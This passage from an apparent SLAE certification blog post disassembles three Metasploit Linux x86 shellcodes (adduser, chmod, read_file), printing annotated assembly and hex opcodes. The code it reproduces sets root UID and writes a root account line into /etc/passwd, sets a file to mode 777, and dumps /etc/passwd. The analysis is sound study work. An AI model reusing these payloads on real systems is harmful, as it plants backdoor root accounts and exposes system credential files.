finally:

    encode = string.decode('hex')

print 'string = %s' % string
print 'encode = %s' % encode

Then I took the shellcode chunk that I'm interested in and checked what string was in:

We can see that our guess was correct, this is the entire /etc/passwd line with our user SLAE, encrypted password, home directory, and shell. Now I can add below my full analysis of this shellcode:


; Metasploit linux/x86/adduser
; Analysis by Guillaume Kaddouch
; SLAE-681


global _start

section .text

_start:

 ; set current user id to 0 (= root)
 ; int setreuid(uid_t ruid, uid_t euid)

 xor ecx,ecx  ; 2nd arg: euid = 0
 mov ebx,ecx  ; 1st arg: ruid = 0
 push byte +0x46  ; push 70 = setreuid()
 pop eax   ; pop 70 into eax
 int 0x80  ; eax = setreuid(0, 0), on success 0 is returned


 ; open /etc/passwd file
 ; int open(const char *pathname, int flags)

 push byte +0x5  ; push 5 = open()
 pop eax   ; pop 5 into eax
 xor ecx,ecx  ; zero out ecx
 push ecx  ; push 0x00000000 on stack to NULL terminate the following string
 push dword 0x64777373 ; string 'dwss' (decoded with hex2string.py)
 push dword 0x61702f2f ; string 'ap//'
 push dword 0x6374652f ; string 'cte/' -> whole string = /etc//passwd
 mov ebx,esp  ; 1st arg: ebx = string address
 inc ecx   ; ecx = 0x00000001 = O_WRONLY (Write Only)
 mov ch,0x4  ; 2nd arg: ecx = 0x00000401 = O_NOCTTY
 int 0x80  ; eax = open(*/etc/passwd, O_WRONLY+O_NOCTTY), fd returned into eax

 xchg eax,ebx  ; save fd into ebx, set eax = */etc/passwd

 ; All asm below is misinterpreted by nasm
 ; it is not assembly, but in reality the line to add to /etc/passwd in the form
 ; user:encrypted_password:0:0::/:/bin/sh
 call next  ; \xe8\x22 = call 0x22 = 34 (string lenght)
    ; jump ahead of the string to the rest of code

 ; passwd line to add
 jnc 0x99
 popad
 cmp al,[gs:ecx+0x7a]
 aaa
 cs push edi
 dec edx
 fs push dword 0x73642e47
 cmp dh,[eax]
 cmp dh,[eax]
 cmp bh,[edx]
 das
 cmp ch,[edi]
 bound ebp,[ecx+0x6e]
 das
 jnc 0xb4
 or bl,[ecx-0x75]  ; 0A598B: one byte belongs to the string (0x0A)

 ; original shellcode chunk
 ; \x73\x6c\x61\x65\x3a\x41\x7a\x37\x2e\x57\x4a\x2e\x64\x68\x47\x2e\x64\x73\x3a
 ; \x30\x3a\x30\x3a\x3a\x2f\x3a\x2f\x62\x69\x6e\x2f\x73\x68\x0a

 ; stripping '\x' with : echo [shellcode chunk] | sed 's/\\//g' | sed 's/x//g'

 ; using ./hex2reversestring.py 736c61653a417a372e574a2e6468472e64733a303a303a3a2f3a2f62696e2f73680a
 ; = slae:Az7.WJ.dhG.ds:0:0::/:/bin/sh

 ; call above continues below
next:
 ; writing to /etc/passwd
 ;  ssize_t write(int fd, const void *buf, size_t count);
 ; 1st arg: ebx = fd

 pop ecx    ; retrieve the address of the begining of user line to add to passwd
     ; 2nd arg: *buf
 mov edx, dword [ecx-4]  ; 3rd arg: size is at the begining of the line string. See below

 ; E8 22 00 00 00 call 0x22
 ; 73 <- ret = ecx
 ; ecx-4 = 73(0) 00(1) 00(2) 00(3) 22(4) = 34 bytes

 push byte 0x4   ; 0x4 = write()
 pop eax    ; prepare syscall
 int 0x80   ; write(fd, *slae:Az7.WJ.dhG.ds:0:0::/:/bin/sh, 33) 

 push byte 0x1   ; 0x1 = exit()
 pop eax    ; prepare syscall
 int 0x80   ; exit()

This shellcode sets the current UID to root, then open /etc/passwd for write, and write a line adding a new user, before exiting.

5.2 METASPLOIT CHMOD SHELLCODE
___________________________________________________

I then decided to analyse as second shellcode, the Metasploit linux/x86/chmod shellcode. On Kali Linux, I used msfvenom to have the shellcode of this payload:

I prepared the file "test" with a chmod 644 on it:

Then, I copy/pasted the shellcode into an text file to put the shellcode on one line, allowing me in the next step to disassemble it:

We can notice that in the middle of the shellcode there is instructions that do not seem to make any sense for doing a chmod, like we saw in the previous analyzed shellcode. To gather more information, I tried to use Libemu again:

Libemu still stops in the middle of the process, instead of giving a full analysis with a C code at the end. In ndisasm output, we can follow all the instructions until an interesting "CALL" which jumps further in the code, skipping an entire block of opcodes like the previous shellcode. I will use again the same python program:

The string finally revealed, is the path to the file to be chmoded. Now we can continue with the full analysis of the shellcode assembly:


; Metasploit linux/x86/chmod
; Analysis by Guillaume Kaddouch
; SLAE-681


global _start

section .text

_start:
 ; chmod
 ; chmod(const char *path, mode_t mode)

 cdq
 push byte 0xf   ; 0xf = 15 = chmod()
 pop eax    ; prepare eax for chmod() syscall
 push edx
 call next  ; call shellcode+31

 ; below is a string misinterpreted as assembly by nasm
 das
 push dword 0x2f656d6f
 jnz 0x7c
 insb
 insb
 popad
 jnz 0x85
 gs das
 jz 0x81
 jnc 0x92
 add [ebx+0x68],bl
 inc dword [ecx]
 add [eax],al

 ; opcodes of assembly chunk above is:
 ; \x2f\x68\x6f\x6d\x65\x2f\x67\x75\x69\x6c\x6c\x61\x75\x6d\x65\x2f\x74\x65\x73\x74\x00
 ; $ echo [chunk] | sed 's/x//g' | sed 's/\\//g' = 2f686f6d652f6775696c6c61756d652f7465737400
 ; $ ./hex2reversestring.py 2f686f6d652f6775696c6c61756d652f7465737400
 ; = '/home/guillaume/test'

 ; this assembly chunk is the end of a string and the begining of code (misinterpreted by nasm)
 ; 0000001E  005B68            add [ebx+0x68],bl
 ; 00000021  FF01              inc dword [ecx]
 ; 00000023  0000              add [eax],al

 ; thanks to gdb and edb debugguers, we know the correct code, see below (2 lines)
 ; 00 end of above string
 ; above call shellcode+31 jumps below
next:
 pop ebx    ; \x5B -> 1st arg: store *path in ebx (file to chmod)
 push 0x01ff   ; \x68\xFF\x01\x00\x00 -> 0x1ff = 777 octal (file's permissions)

 pop ecx    ; 2nd arg: ecx = 777 octal
 int 0x80   ; eax = chmod(*path, 777), *path = /home/guillaume/test

 ; exit()
 push byte 0x1
 pop eax
 int 0x80

This shellcode does a "chmod 777 /home/guillaume/test". Below I show that this shellcode is working:

To analyse it, we can run gdb and set a breakpoint, or we could insert our shellcode into a C program and then use gdb to set a breakpoint at the start of the shellcode. I used gdb directly:

We are interested by the CALL and where it jumps. We can set another breakpoint at the memory address of CALL:

We can confirm that the middle block of shellcode is skipped over. It is possible to have a graphical view with edb debbuguer, by setting a breakpoint at the CALL address :

We can clearly see the block of string jumped over, and precisely view how the opcodes are splitted where the CALL jumps to "\x5B" (pop eax) alone, then "\x68\xff\x01\x00\x00" (push 0x01ff). Ndisasm wrongly showed it was "\x00\x5B\x68" and "\xff\x01", then "\x00\x00". This demonstrates that static analysis is sometimes not enough, and that using a debugguer while the program is running is necessary.

5.3 METASPLOIT READ_FILE SHELLCODE
___________________________________________________

I then decided to analyse as third shellcode, the Metasploit linux/x86/read_file shellcode. On Kali Linux, I used msfvenom to have the shellcode of this payload:

Then, I copy/pasted the shellcode into an text file to put the shellcode on one line, allowing me in the next step to disassemble it:

We can recognize at the end a CALL that jumps back at 0x2, which means at the begining of the shellcode. It is clearly a JMP CALL POP method. Trying again Libemu to learn more about the shellcode:

Libemu still stops in the middle of the process, instead of giving a full analysis with a C code at the end. I will use again the same python program as for the previous shellcodes, to know what means the last chunk of opcodes:

The string revealed is the path to the file to be read. Now we can continue with the full analysis of the shellcode assembly:

  
; Metasploit linux/x86/read_file
; Analysis by Guillaume Kaddouch
; SLAE-681


global _start

section .text

_start:

 jmp short jump1  ; jump to 'jump1' (JMP CALL POP technique)

shellcode:

 ; open /etc/passwd
 ; int open(const char *pathname, int flags) 

 mov eax,0x5  ; 0x5 = open()
 pop ebx   ; save ret on stack into ebx = *pathname
 xor ecx,ecx  ; zero out ecx, 2nd arg = 0x0 (O_RDONLY)
 int 0x80  ; eax = open(*pathname, 0x0)

 ; read /etc/passwd
 ; ssize_t read(int fd, void *buf, size_t count)

 mov ebx,eax  ; 1st arg: fd retrieved in eax saved into ebx
 mov eax,0x3  ; 0x3 = read()
 mov edi,esp  ; save stack pointer into edi
 mov ecx,edi  ; 2nd arg: ecx points to the stack (*buf has now room to receive bytes read)
 mov edx,0x1000  ; 3rd arg: 0x1000 = 4096 bytes to read
 int 0x80  ; eax = read(fd, *buf, 4096)

 ; write
 ; ssize_t write(int fd, const void *buf, size_t count)

 mov edx,eax  ; 3rd arg: edx = count of bytes returned by read()
 mov eax,0x4  ; 0x4 = write()
 mov ebx,0x1  ; 1st arg: 0x1 = stdin (display on screen)
 int 0x80  ; write(stdin, *buf, count)

 ; exit()
 mov eax,0x1
 mov ebx,0x0
 int 0x80

jump1:
 call shellcode  ; jump to 'shellcode'
 mypath db "/etc/passwd"
 
 ; string misinterpreted by ndisasm as instructions
 ; opcodes = \x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x00
 ; $ echo '\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x00' | sed 's/x//g' | sed 's/\\//g' = 2f6574632f70617373776400
 ; ./hex2reversestring.py 2f6574632f70617373776400
 ; = /etc/passwd

This shellcode reads /etc/passwd and ouputs it to the screen. Below I show that this shellcode is working:

The output has been cutted. We can see that this shellcode works as advertised.

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/

Student ID: SLAE-681